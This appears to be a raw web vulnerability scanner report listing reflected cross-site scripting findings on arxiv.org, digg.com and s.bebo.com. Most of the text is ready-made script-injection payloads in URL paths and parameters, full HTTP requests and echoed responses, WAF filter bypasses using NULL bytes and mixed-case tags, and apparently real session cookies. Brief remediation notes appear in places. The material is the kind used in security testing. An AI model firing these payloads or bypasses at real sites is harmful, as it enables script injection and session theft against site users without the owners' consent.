<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LOc1ba4<script>alert(1)</script>38523436cf0/9809032.' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96bec<script>alert(1)</script>31850fde6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032.96bec<script>alert(1)</script>31850fde6f7 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:10 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861230402172; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1817

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<h1>Paper identifier 'cs.LO/9809032.96bec<script>alert(1)</script>31850fde6f7' not recognized</h2>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 901ff</title><script>alert(1)</script>733d757fda2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032.901ff</title><script>alert(1)</script>733d757fda2 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:12 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861232170207; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1841

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<title>[cs.LO/9809032.901ff</title><script>alert(1)</script>733d757fda2] Bad paper identifier</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3ae2c</title><script>alert(1)</script>18033472b07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs3ae2c</title><script>alert(1)</script>18033472b07/0605124 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:09 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861229158723; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1597

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<title>[cs3ae2c</title><script>alert(1)</script>18033472b07/0605124] Bad paper identifier</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c79dc<script>alert(1)</script>9b8a1a41a8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/csc79dc<script>alert(1)</script>9b8a1a41a8b/0605124 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:07 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861227679531; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1581

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<h1>Paper identifier 'csc79dc<script>alert(1)</script>9b8a1a41a8b/0605124' not recognized</h2>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2feab</title><script>alert(1)</script>58dbd9a9988 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs/06051242feab</title><script>alert(1)</script>58dbd9a9988 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:10 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861230711412; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1829

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<title>[cs/06051242feab</title><script>alert(1)</script>58dbd9a9988] Bad paper identifier</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d257a</title>0772276941 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <TITLE> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /abs/cs/0605124d257a</title>0772276941 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:22 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861242753578; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1751

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<title>[cs/0605124d257a</title>0772276941] Bad paper identifier</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 691f5<script>alert(1)</script>7fdaff06913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs/0605124691f5<script>alert(1)</script>7fdaff06913 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:47:09 GMT
Server: Apache
Set-Cookie: browser=174.122.23.218.1289861229913989; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1805

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
<h1>Paper identifier 'cs/0605124691f5<script>alert(1)</script>7fdaff06913' not recognized</h2>
...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 354e6<script>alert(1)</script>9e4bbe4ab3a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 2f9a3<script>alert(1)</script>3f2186159c0 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b2d4b<script>alert(1)</script>7accd93245f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2592d<script>alert(1)</script>c1e822091b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 659ac<script>alert(1)</script>baaaa234f98 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload af05b<script>alert(1)</script>7e6dbe063e2 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 8d7c4<script>alert(1)</script>ee2ca8de652 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007bcf2"><script>alert(1)</script>8ead5cb9030 was submitted in the REST URL parameter 1. This input was echoed as 7bcf2"><script>alert(1)</script>8ead5cb9030 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%007bcf2"><script>alert(1)</script>8ead5cb9030 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093c78"><ScRiPt>alert(1)</ScRiPt>c19a972995a was submitted in the REST URL parameter 1. This input was echoed as 93c78"><ScRiPt>alert(1)</ScRiPt>c19a972995a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /submit%0093c78"><ScRiPt>alert(1)</ScRiPt>c19a972995a?phase=2&url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16d9a'><script>alert(1)</script>ce012ac9138 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site16d9a'><script>alert(1)</script>ce012ac9138/index20_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: it-IT
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:38 GMT
Content-Length: 9148
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ea0"><img%20src%3da%20onerror%3dalert(1)>bacbb2e5188 was submitted in the REST URL parameter 2. This input was echoed as c4ea0"><img src=a onerror=alert(1)>bacbb2e5188 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/sitec4ea0"><img%20src%3da%20onerror%3dalert(1)>bacbb2e5188/index20_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:37 GMT
Content-Length: 9813
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d29f6'%3baefa9bf4084 was submitted in the REST URL parameter 2. This input was echoed as d29f6';aefa9bf4084 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/sited29f6'%3baefa9bf4084/index20_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: fr-FR
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:38 GMT
Content-Length: 9400
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a41db<script>alert(1)</script>d802fa599a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/sitea41db<script>alert(1)</script>d802fa599a1/index20_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:39 GMT
Content-Length: 10859
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/sitea41db<script>alert(1)</script>d802fa599a1/index20_script.js page, please try again.</div>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c22"><img%20src%3da%20onerror%3dalert(1)>1f7725decc3 was submitted in the REST URL parameter 3. This input was echoed as a7c22"><img src=a onerror=alert(1)>1f7725decc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/a7c22"><img%20src%3da%20onerror%3dalert(1)>1f7725decc3 HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:41 GMT
Content-Length: 8706
Connection: close
Cache-Control: no-cache
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 26b8b<img%20src%3da%20onerror%3dalert(1)>99e5b52e6fa was submitted in the REST URL parameter 3. This input was echoed as 26b8b<img src=a onerror=alert(1)>99e5b52e6fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/index20_script.js26b8b<img%20src%3da%20onerror%3dalert(1)>99e5b52e6fa HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:44 GMT
Content-Length: 10495
Connection: close
Cache-Control: no-cache
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee4b2'><script>alert(1)</script>3faed2ba211 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site/index20_script.jsee4b2'><script>alert(1)</script>3faed2ba211 HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:41 GMT
Content-Length: 8799
Connection: close
Cache-Control: no-cache
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 904d7'%3b38ebcb9ff8d was submitted in the REST URL parameter 3. This input was echoed as 904d7';38ebcb9ff8d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/site/index20_script.js904d7'%3b38ebcb9ff8d HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:41 GMT
Content-Length: 8630
Connection: close
Cache-Control: no-cache
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13807<script>alert(1)</script>33e23564059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site13807<script>alert(1)</script>33e23564059/regframe_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:40 GMT
Content-Length: 9166
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: nie mamy strony/c/site13807<script>alert(1)</script>33e23564059/regframe_script.js . Spróbuj ponownie później.</div>
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45dd4'%3b64cce22bcae was submitted in the REST URL parameter 2. This input was echoed as 45dd4';64cce22bcae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/site45dd4'%3b64cce22bcae/regframe_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:39 GMT
Content-Length: 8973
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db825'><script>alert(1)</script>6b3de097709 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/sitedb825'><script>alert(1)</script>6b3de097709/regframe_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
